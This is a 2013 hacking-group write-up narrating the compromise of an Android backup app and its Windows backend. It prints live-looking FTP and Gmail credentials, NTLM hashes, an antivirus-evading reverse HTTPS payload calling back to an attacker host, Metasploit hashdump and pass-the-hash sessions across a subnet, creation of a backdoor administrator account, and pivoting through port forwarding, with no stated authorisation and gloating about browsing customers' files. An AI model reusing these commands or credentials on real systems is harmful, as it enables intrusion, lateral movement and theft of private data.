Mobile Application Hacking Diary whitepaper part one.
e4c6024f8478fdc045b8579a4c2724e32ec5a10026f2eff6c54bd0d3f6b96044
|=--------------------------------------------------------------------=|
|=------------=[ Mobile Application Hacking Diary Ep.1]=--------------=|
|=--------------------------=[ 3 July 2013 ]=-------------------------=|
|=----------------------=[ By CWH Underground ]=--------------------=|
|=--------------------------------------------------------------------=|
######
Info
######
Title : Mobile Application Hacking Diary Ep.1
Author : ZeQ3uL and diF
Team : CWH Underground
Date : 2013-07-03
##########
Contents
##########
[0x00] - Introduction
[0x01] - Application Reconnaissance
[0x01a] - Insecure Data Storage
[0x01b] - Decompile Application Package
[0x02] - Man in the Middle Attack
[0x02a] - Preparation Tools
[0x02b] - MitM Attack
[0x03] - Server-Side Attack
[0x03a] - Scanning
[0x03b] - Gaining Access
[0x03c] - Bypass Anti-Virus
[0x03d] - PWNed System !!
[0x03e] - It's Not Over !!
[0x04] - Greetz To
#######################
[0x00] - Introduction
#######################
000000000000000000000000000000000000000000000000
00000000000000 00000000000000000 000000000000000 During the past few years, we've seen mobile devices evolve from simple,
000000000000000 00000000000000 000000000000000 rather dumb phones to complete, integrated communication devices.
000000000000000 00000000000 0000000000000000 As these devices became more intelligent ("smart" phones) and data
0000000000000000 00000000000000000 transfer speeds on mobile networks increased significantly, people no longer
00000000000000 000000000000000 used them solely for making phone calls or sending text messages, but started
000000000000 000 000 0000000000000 using them for sending email, browsing the Internet, playing games, checking-in
00000000000 000 000 000000000000 for flights, or doing online banking transactions.
0000000000 00000000000
0000000000 00000000000 Companies started creating mobile applications to offer all sorts of services to their
000000000000000000000000000000000000000000000000 clients. Today, mobile applications are available for storing and synchronizing data
0000 00 00 0000 files in the cloud, participating in social network sites, or even playing with a talking
000 00 00 000 crazy frog.
000 00 00 000
000 00 00 000 As the data that is stored, processed, and transferred by these applications can often
000 00 00 000 be considered sensitive, it is important to ensure that the security controls on these mobile
0000 000 000 0000 devices and applications is effective.
0000000000 0000000000
000000000000000 000000 0000 00000000000
000000000000000 000000 00000 0000000000 --SANS Penetration Testing Blog
000000000000000 000000 000000 000000000
000000000000000000000000000000000000000000000000
This papers is the narrative and the explanation of our penetration testing techniques from the real world as a case study of an Android application
testing (Android is a Linux-based platform developed by Google and the Open Handset Alliance. Application programming for it is done exclusively in Java.
The Android operating system software stack consists of Java applications running on a Dalvik virtual machine (DVK)). The main functions of this application
work similarly to the famous Apple's iCloud; backup picture, video, contact and sync to a personal cloud system.
Let's Begin! :))
#####################################
[0x01] - Application Reconnaissance
#####################################
"Usually, a client software package is installed locally on the mobile device which acts as the front-end for the user. Packages are typically downloaded
from an app store or market, or provided via the company's website. Similar to non-mobile software, these applications can contain a myriad of vulnerabilities.
It is important to note that most testing on the client device usually requires a device that is rooted or jailbroken. For example, the authentic mobile OS
will most likely prevent you from having access to all files and folders on the local file system. Furthermore, as software packages can often be decompiled,
tampered with or reverse engineered, you may want to use a device that does not pose any restrictions on the software that you can install."
--SANS Penetration Testing Blog
Our first mission is Application Reconnaissance. The objective of this mission is to understand how the application work, then try to enumerate sensitive information
from data stored in a local storage and to dig out even more information, application package will be decompiled into a form of source code.
+++++++++++++++++++++++++++++++++
[0x01a] - Insecure Data Storage
+++++++++++++++++++++++++++++++++
We've started our first mission by creating an Android Pentest platform (Install Android SDK, Android Emulator and Burpsuite proxy) and get ready to
connect to our phone using Android Debug Bridge (http://developer.android.com/tools/help/adb.html) , ADB is a versatile command line tool that lets you
communicate with an emulator instance or connected Android-powered device.
First, we signed up and logged in to the application then used ADB to connect a phone with a debug mode and used "adb devices" command.
---------------------------------------------------------------
[zeq3ul@12:03:51]-[~]> adb devices
* daemon not running. starting it now *
* daemon started successfully *
List of devices attached
3563772CF3BC00FH device
---------------------------------------------------------------
"adb shell" command was the command we've used to connect to the phone in order to explore through the internal directory.
Before we can do any further exploration, we need to identify real name of the application package which usually found in "/data/app/" folder in a
form of ".apk".
"/data/app/com.silentm.msec-v12.apk" was found to be a package of our target application so "com.silentm.msec-v12" is the real name of the package.
Finally, folder belonging to the application in "/data/data" is most likely to be the place that sensitive information of the application are stored
locally. As expected, we found crucial information stored in "/data/data/com.silentm.msec-v12/shared_prefs" as below.
---------------------------------------------------------------
[zeq3ul@12:05:24]-[~]> adb shell
# cd /data/data/com.silentm.msec-v12/shared_prefs
# cat PREFS.xml
<?xml versions='1.0' encoding='utf-8' standalone='yes'?>
<map>
<string name="Last_added">9</string>
<boolean name"configured" value="true"/>
<string name="package">Trial</string>
<string name="version">1.2</string>
<string name="username">zeq3ul</string>
<string name="password">NXBsdXM0PTEw</string>
<string name="number">089383933283</string>
<string name="supportedextension">{"e;D"e;:"e;HTML,XLS,XLSX,XML,TXT,DOC,DOCX,PPT,PDF,ISO,ZIP,RAR,RTF"e;,"e;M"e;:
"e;MP3,MP2,WMA,AMR,WAV,OGG,MMF,AC3"e;,"e;I"e;:"e;JPEG,JPG,GIF,BMP,PNG,TIFF"e;,"e;V"e;:"e;3GP,MP4,MPEG,
WMA,MOV,FLV,MKV,MPEG4,AVI,DivX"e;}</string>
...
</map>
---------------------------------------------------------------
We've found our username and password stored locally in PREFS.xml, but password seems to be encrypted with some kind of encyption but if we take a
good look into it you will found it was only base64 encoded string, so we can easily decoded it to reveal a real password. "NXBsdXM0PTEw" > "5plus4=10"
TIPS! This is a bad example of how applications store sensitive data and also the encoding with Base64 (Encode != Encrypt) is such a bad idea of
storing a password too. Example for bad code shown below:
---------------------------------------------------------------
public void saveCredentials(String userName,String password)
{
SharedPreferences PREFS;
PREFS=getSharedPreferences(MYPREFS,Activity.MODE_PRIVATE);
SharedPreferences.Editor editor = PREFS.edit();
String mypassword = password;
String base64password = new String(Base64.encodeToString(mypassword.getBytes(),4));
editor.putString("Username", userName);
editor.putString("Password", base64password);
editor.commit();
}
---------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++
[0x01b] - Decompile Application Package
+++++++++++++++++++++++++++++++++++++++++
Next, in order to completely understand the mechanism of the application, we need to obtain the source code of the application. For Android
application, this can be done by decompiling the Android Package (".apk") of the application.
Android packages (".apk" files) are actually simply ZIP files. They contain the AndroidManifest.xml, classes.dex, resources.arsc, among other
components. You can rename the extension and open it with a ZIP utility such as WinZip to view its contents.
We've started with "adb pull" command to extract android application from mobile phone.
---------------------------------------------------------------
[zeq3ul@12:08:37]-[~]> adb pull /data/app/com.silentm.msec-v12.apk
1872 KB/s (5489772 bytes in 2.862s)
---------------------------------------------------------------
The next step is to decompile ".apk" we've just got using the tools called dex2jar (http://code.google.com/p/dex2jar/). dex2jar is intended to
convert ".dex" files to human readable ".class" files in java.
NOTICE! "class.dex" is stored in every ".apk" as mentioned above. This can be proved by changing any ".apk" to ".zip" and extracting it then you
will find out about the structure of an ".apk"
---------------------------------------------------------------
[zeq3ul@12:09:11]-[~]> bash dex2jar.sh com.silentm.msec-v12.apk
dex2jar version: translator-0.0.9.8
dex2jar com.silentm.msec-v12.apk -> com.silentm.msec-v12_dex2jar.jar
Done.
---------------------------------------------------------------
JD-GUI (http://java.decompiler.free.fr/?q=jdgui) is our tool of choice to read a decompiled source (".jar" from dex2jar). In this case
is "com.silentm.msec-v12_dex2jar.jar"
NOTE: JD-GUI is a standalone graphical utility that displays Java source codes of “.class” files. You can browse the reconstructed source code
with the JD-GUI for instant access to methods and fields.
As a result, We found that "Config.class" stored smelly information (hard-coded) the source as shown below:
Config.class
---------------------------------------------------------------
package com.silentm.msec;
public class Config
{
public static final String CONTACT_URL = "http://203.60.240.180/en/Contact.aspx";
public static final String Check_Memory = "http://203.60.240.180/en/CheckMem.aspx";
public static final String BackupSMS = "http://203.60.240.180/en/backupsms.aspx";
public static final String Forgot_Password = "http://203.60.240.180/en/ForgotPassword.aspx";
public static final String FTP_URL = "203.60.240.183";
public static final String FTP_User = "msec1s";
public static final String FTP_Password = "S1lentM!@#$ec";
public static final String Profile = "http://203.60.240.180/en/Profile.aspx";
public static final int MAX_MEMORY = 500;
public static final int LOG_COUNT = 30;
...
}
---------------------------------------------------------------
Explain!! backup URL and FTP user and password was found in the source code (W00T W00T !!). Now we know that this application use FTP protocol to
transfer picture, SMS, contact information to cloud server and it's SUCK!! because it's hard-coded and FTP is not a secure protocol.
###################################
[0x02] - Man in the Middle Attack
###################################
"The second attack surface is the communications channel between the client and the server. Although applications use more and more secured communications
for sending sensitive data, this is not always the case. In your testing infrastructure, you will want to include an HTTP manipulation proxy to intercept and alter traffic.
If the application does not use the HTTP protocol for its communication, you can use a transparent TCP and UDP proxy like the Mallory tool. By using a proxy, you can intercept,
analyze, and modify data that is communicated between the client and the server."
--SANS Penetration Testing Blog
As we found that our target application use HTTP protocol, the next step is to setup a HTTP intercepting proxy tools such as ZapProxy or Burpsuite (Burpsuite was chosen this time)
in order to perform our second misson, Man in the Middle attack, agaist the application. Having a web proxy intercepting requests is a key piece of the puzzle. From this point forward,
our test will use similar technique to that of regular web applications testing.
We've tried to intercepted every HTTP requests and response on application with Burpsuite Proxy (http://www.portswigger.net/burp/). For HTTP request, we found sensitive information
(username and password) sent to server-side because it use HTTP protocol that sent packet in clear text while performing log in shown below (anyone in the middle of this communication
will see those information crystal clear, what a kind App!).
Burpsuite: HTTP Request
---------------------------------------------------------------
POST http://203.60.240.180/en/GetInfo.aspx HTTP/1.1
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Host: 203.60.240.180
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
imei=352489051163052&username=zeq3ul&password=5plus4=10
---------------------------------------------------------------
Moreover, on HTTP response, We found the information that surprise us; email and password for Gmail of someone (we found out latter that was an administrator email)
was shown in front of our eyes!.
Burpsuite: HTTP Response
---------------------------------------------------------------
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf=8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 07 June 2013 12:15:37 GMT
Content-Length: 2405
{"AppVersion":"1.2","FTP_USER":"msec1s","FTP_PASS":"S1lentM!@#$ec","FTP_SERVER":"203.60.240.183","MAX_MEMORY":"500","LOG_COUNT":"30",
"Smtp":"smtp.gmail.com","FromEmail":"mseccloud@gmail.com","FromEmailPwd":"M[Sec)0/",................
---------------------------------------------------------------
As a result, We were able to sniff username and password in clear text (no SSL nor encryption) and compromise the email of an administrator
using email "mseccloud@gmail.com" and password "M[Sec)0/" that they gave us for free via HTTP reponse. :\
#############################
[0x03] - Server-Side Attack
#############################
"In most cases, the server to which the client communicates is one or more web servers. The attack vectors for the web servers behind a mobile application
is similar to those we use for regular web sites. Aside from looking for vulnerabilities in the web application, you should also perform host and service scans
on the target system(s) to identify running services, followed by a vulnerability scan to identify potential vulnerabilities, provided that such testing is allowed
within the scope of the assignment."
--SANS Penetration Testing Blog
++++++++++++++++++++
[0x03a] - Scanning
++++++++++++++++++++
As we've found backend URL (203.60.240.180 and 203.60.240.183) from the source code, we need to check the security of the backend system as well.
We've started by scanning target for open ports by using nmap (http://nmap.org).
Nmap Result for 203.60.240.180
---------------------------------------------------------------
[zeq3ul@12:30:54]-[~]> nmap -sV -PN 203.60.240.180
Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-07 12:31 ICT
Nmap scan report for 203.60.240.180
Host is up (0.0047s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.0
443/tcp open ssl/http Microsoft IIS httpd 7.0
3389/tcp open ms-wbt-server?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.99 seconds
---------------------------------------------------------------
Nmap Result for 203.60.240.183
---------------------------------------------------------------
[zeq3ul@12:35:12]-[~]> nmap -sV -PN 203.60.240.183
Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-07 12:35 ICT
Nmap scan report for 203.60.240.183
Host is up (0.0036s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 16.38 seconds
---------------------------------------------------------------
From the scan result, we got a list of opening ports and we've found that there were IIS and Terminal Service running on 203.60.240.180
and FTP running on 203.60.240.183; It's time to grab low-hanging fruits.
++++++++++++++++++++++++++
[0x03b] - Gaining Access
++++++++++++++++++++++++++
As we found FTP username and password from the source code ("msec1s","S1lentM!@#$ec"). We were able to access to FTP service running on the server as shown below:
FTP Server: 203.60.240.183
---------------------------------------------------------------
[zeq3ul@12:40:12]-[~]> ftp 203.60.240.183
Connected to 203.60.140.183
220 Microsoft FTP Service
User <203.60.140.183:<none>>: msec1s
331 Password required
Password:
230 User logged in.
ftp> pwd
257 "/" is current directory.
ftp>
---------------------------------------------------------------
Now that we've compromised FTP Server using account "msec1s". We were able to access all customer contact, picture, video, Etc. Excitedly, we expected to find some "INTERESTING" picture
or Clip video; BUT we found DICK! WTF!! so we got shock and stop searching. OTL
_____________________________________________________________
| NO DICK NO DICK NO DICK NO DICK NO DICK ^^^^^^^^\ |
| NO DICK NO DICK NO DICK NO DICK NO DICK | | |
| NO DICK NO DICK NO DICK NO DICK NO DICK |_ __ | |
| NO DICK NO DICK NO DICK NO DICK NO DICK (.(. ) | |
| NO DICK NO DICK NO DICK NO DICK NO DI _ (_ ) |
| \\ /___/' / |
| _\\_ \ | |
| (( ) /====| |
| \ <.__._- \ |
|___________________________________________ <//___. ||
Moving to our next target, 203.60.240.180, we've tried to access target via Terminal Service. Luckily, we were able to access target server using the same username and password from FTP Server
("msec1s","S1lentM!@#$ec"). Yummy!
Remote Desktop with rdesktop
---------------------------------------------------------------
[zeq3ul@12:56:04]-[~]> rdesktop -u msec1s -p S1lentM!@#$ec 203.60.240.180
---------------------------------------------------------------
Moreover, "msecls" account was in an administrator privileges group. OWNAGED!
+++++++++++++++++++++++++++++
[0x03c] - Bypass Anti-virus
+++++++++++++++++++++++++++++
Many Anti-Virus programs work by pattern or signature matching. If any program look like malware by its appearance, the AV will catch it. If the malicious file
has a signature that the AV do not know, AV are most likely to identify those file as clean and unharmed.
"Veil, a new payload generator created by security expert and Blackhat USA class instructor Chris Truncer, does just that."
-- https://www.christophertruncer.com/veil-a-payload-generator-to-bypass-antivirus/
Simply pick payload and use msfveom shellcode, chose reverse HTTPS to our web server (cwh.dyndns.org) by following command:
---------------------------------------------------------------
========================================================================
Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
========================================================================
[?] Use msfvenom or supply custom shellcode?
1 - msfvenom (default)
2 - Custom
[>] Please enter the number of your choice: 1
[?] What type of payload would you like?
1 - Reverse TCP
2 - Reverse HTTP
3 - Reverse HTTPS
0 - Main Menu
>] Please enter the number of your choice: 3
[?] What's the Local Host IP Address: cwh.dyndns.org
[?] What's the Local Port Number: 443
---------------------------------------------------------------
Now we've got payload.exe file, When any Windows system execute this .exe, they will try to connect to the our server immediately.
+++++++++++++++++++++++++++
[0x03d] - PWNED System !!
+++++++++++++++++++++++++++
Time to PWN! As the target server (203.60.140.180) can be access using MSRDP Service (on port 3389) + it has access to the internet, we can just open
the web server on our machine and then remote (via MSRDP) to the server to download and get our payload (payload.exe) executed. Executed Metasploit payload
(payload.exe) will connect a meterpreter payload back (reverse_https) to our server (cwh.dyndns.org).
After that, we used hashdump to get LM/NTLM hash on server but this cannot be done yet because if you are on a x64 box and meterpreter isn't running in a x64 process,
it will fail saying that it doesn't have the correct version offsets (x64 system and Meterpreter is x86/win32). So we need to find a good process to migrate into and
kick it from there. In this case we migrate our process to Winlogon process which running as x64 box.
Our console will have a log like this.
---------------------------------------------------------------
[zeq3ul@13:16:14]-[~]> sudo msfconsole
[sudo] password for zeq3ul:
Call trans opt: received. 2-19-98 13:18:48 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \
,.| ' `-.;_'
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``-
``-..__``--`
http://metasploit.pro
=[ metasploit v4.6.2-1 [core:4.6 api:1.0]
+ -- --=[ 1113 exploits - 701 auxiliary - 192 post
+ -- --=[ 300 payloads - 29 encoders - 8 nops
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set LHOST cwh.dyndns.org
LHOST => cwh.dyndns.org
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://cwh.dyndns.org:443/
msf exploit(handler) > [*] Starting the payload handler...
[*] 203.60.240.180:49160 Request received for /oOTJ...
[*] 203.60.240.180:49160 Staging connection for target /oOTJ received...
[*] Patched user-agent at offset 640488...
[*] Patched transport at offset 640148...
[*] Patched URL at offset 640216...
[*] Patched Expiration Timeout at offset 640748...
[*] Patched Communication Timeout at offset 640752...
[*] Meterpreter session 1 opened (cwh.dyndns.org:443 -> 203.60.240.180:49160) at 2013-06-07 13:25:17 +0700
sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 WIN-UUOFVQRLB13\msec1s @ WIN-UUOFVQRLB13 cwh.dyndns.org:443 -> 203.60.240.180:49160 (203.60.240.180)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : WIN-UUOFVQRLB13
OS : Windows 2008 R2 (Build 7600).
Architecture : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter : x86/win32
meterpreter > ps -S winlogon
Filtering on process name...
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
384 340 winlogon.exe x86_64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
meterpreter > migrate 384
[*] Migrating from 1096 to 384...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer : WIN-UUOFVQRLB13
OS : Windows 2008 R2 (Build 7600).
Architecture : x64
System Language : en_US
Meterpreter : x64/win64
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY c6b1281c29c15b25cfa14495b66ea816...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
msec1s:1000:aad3b435b51404eeaad3b435b51404ee:73778dadcbb3fbd800e5bb383d5ec1e3:::
---------------------------------------------------------------
Now we got LM/NTLM hash for our target (203.60.240.180).
++++++++++++++++++++++++++
[0x03e] - It's Not Over
++++++++++++++++++++++++++
[ O ]
\ \ p Let's move on the our final mission.
\ \ \o/
\ \--'---_
/\ \ / ~~\_
./---/__|=/_/------//~~~\
/___________________/O O \
(===(\_________(===(Oo o o O)
\~~~\____/ \---\Oo__o--
~~~~~~~ ~~~~~~~~~~
In common case, a next thing to do is to begin to crack the hashes we've got for later use. There are many caveats to cracking Windows hashes and it does take some time
so you might as well begin this process ASAP right?
However, there is often no reason to spend time/cycles cracking hashes when you can "PASS THE HASH".
One of the most common way to "pass the hash" is by using the PSEXEC module (exploit/windows/smb/psexec) in Metasploit. This module executes an arbitrary payload by authenticating
to Windows SMB using administrative credentials (password or hash), and creating a Windows service. This is a pretty powerful module on most pen-test tools, once you get to the point of dumping
hashes on a Windows machine.
"Once you use it successfully it will become very apparent that this power could be multiplied by several orders of magnitude if someone wrote a scanning-capable version that accepts an RHOSTS option
rather than a single RHOST. Apparently that's what Carlos Perez thought when he wrote psexec_scanner"
-- http://www.darkoperator.com/blog/2011/12/16/psexec-scanner-auxiliary-module.html
---------------------------------------------------------------
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use auxiliary/scanner/smb/psexec_scanner
msf auxiliary(psexec_scanner) > show options
Module options (auxiliary/scanner/smb/psexec_scanner):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true no Start an Exploit Multi Handler to receive the connection
LHOST yes Local Hosts for payload to connect.
LPORT yes Local Port for payload to connect.
OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
PAYLOAD windows/meterpreter/reverse_tcp yes Payload to use against Windows host
RHOSTS yes Range of hosts to scan.
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain WORKGROUP yes SMB Domain
SMBPass no SMB Password
SMBUser no SMB Username
THREADS yes The number of concurrent threads
TYPE manual no Type of credentials to use, manual for provided one, db for those found on the database (accepted: db, manual)
msf auxiliary(psexec_scanner) > set LHOST cwh.dyndns.org
LHOST => cwh.dyndns.org
msf auxiliary(psexec_scanner) > set LPORT 8443
LPORT => 8443
msf auxiliary(psexec_scanner) > set RHOSTS 203.60.240.0/24
RHOSTS => 203.60.240.0/24
msf auxiliary(psexec_scanner) > set SMBUser administrator
SMBUser => administrator
msf auxiliary(psexec_scanner) > set SMBPass aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72
SMBPass => aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72
msf auxiliary(psexec_scanner) > set THREADS 10
THREADS => 10
msf auxiliary(psexec_scanner) > exploit
[*] Using the username and password provided
[*] Starting exploit multi handler
[*] Started reverse handler on cwh.dyndns.org:8443
[*] Starting the payload handler...
[*] Scanned 031 of 256 hosts (012% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 077 of 256 hosts (030% complete)
[*] Scanned 111 of 256 hosts (043% complete)
[*] Scanned 129 of 256 hosts (050% complete)
[*] Scanned 154 of 256 hosts (060% complete)
[*] 203.60.240.165:445 - TCP OPEN
[*] Trying administrator:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72
[*] 203.60.240.180:445 - TCP OPEN
[*] Trying administrator:aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72
[*] Connecting to the server...
[*] Authenticating to 203.60.240.165:445|WORKGROUP as user 'administrator'...
[*] Connecting to the server...
[*] Authenticating to 203.60.240.180:445|WORKGROUP as user 'administrator'...
[*] Uploading payload...
[*] Uploading payload...
[*] Created \ExigHylG.exe...
[*] Created \xMhdkXDt.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.180[\svcctl] ...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.165[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.180[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:203.60.240.165[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ZHBMTKgE - "MgHtGamQQzIQxKDJsGWvcgiAStFttWMt")...
[*] Creating a new service (qJTBfPjT - "MhIpwSR")...
[*] Closing service handle...
[*] Closing service handle...
[*] Opening service...
[*] Opening service...
[*] Starting the service...
[*] Starting the service...
[*] Removing the service...
[*] Removing the service...
[*] Sending stage (751104 bytes) to 203.60.240.180
[*] Closing service handle...
[*] Closing service handle...
[*] Deleting \xMhdkXDt.exe...
[*] Deleting \ExigHylG.exe...
[*] Meterpreter session 2 opened (cwh.dyndns.org:8443 -> 203.60.240.180:49161) at 2013-07-02 13:40:42 +0700
[*] Sending stage (751104 bytes) to 203.60.240.165
[*] Meterpreter session 3 opened (cwh.dyndns.org:8443 -> 203.60.240.165:50181) at 2013-07-02 13:42:06 +0700
[*] Scanned 181 of 256 hosts (070% complete)
[*] Scanned 205 of 256 hosts (080% complete)
[*] Scanned 232 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(psexec_scanner) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 WIN-UUOFVQRLB13\msec1s @ WIN-UUOFVQRLB13 cwh.dyndns.org:443 -> 203.60.240.180:49160 (203.60.240.180)
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WIN-UUOFVQRLB13 cwh.dyndns.org:8443 -> 203.60.240.180:49161 (203.60.240.180)
3 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WIN-HDO6QC2QVIV cwh.dyndns.org:8443 -> 203.60.240.165:50181 (203.60.240.165)
msf auxiliary(psexec_scanner) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-HDO6QC2QVIV
OS : Windows 2008 R2 (Build 7600).
Architecture : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter : x86/win32
meterpreter > shell
Process 2568 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>net user cwh 5plus4=10 /add
net user cwh 5plus4=10 /add
The command completed successfully.
C:\Windows\system32>net localgroup administrators cwh /add
net localgroup administrators cwh /add
The command completed successfully.
C:\Windows\system32>exit
---------------------------------------------------------------
So we were able to compromise another machine (203.60.240.165).
We typed "netstat -an" to view open ports on the target and found that Remote Desktop (MSRDP on port 3389) opened but we cannot directly remote to the target
because the port was filtered by firewall. But there is the way to bypass this control.
We used "portfwd" command from the Meterpreter shell. Portfwd is most commonly used as a pivoting technique to allow direct access to machines otherwise inaccessible
from the attacking system. Running this command on the compromised host with access to both the attacker and destination network (or system), we can essentially forward
TCP connections through this machine effectively making it a pivot point much like the port forwarding technique used with an ssh connection, portfwd will relay TCP connections to and from the connected machines.
---------------------------------------------------------------
meterpreter > portfwd add -l 3389 -r 127.0.0.1 -p 3389
[*] Local TCP relay created: 0.0.0.0:3389 <-> 127.0.0.1:3389
---------------------------------------------------------------
Lastly, we used rdesktop to connect to machine target server (203.60.240.165) with following command.
---------------------------------------------------------------
[zeq3ul@14:02:51]-[~]> rdesktop -u cwh -p 5plus4=10 localhost
---------------------------------------------------------------
FULLY COMPROMISED!! GGWP!
####################
[0x04] - Greetz To
####################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2, diF, MaYaSeVeN
Special Thx : Exploit-db.com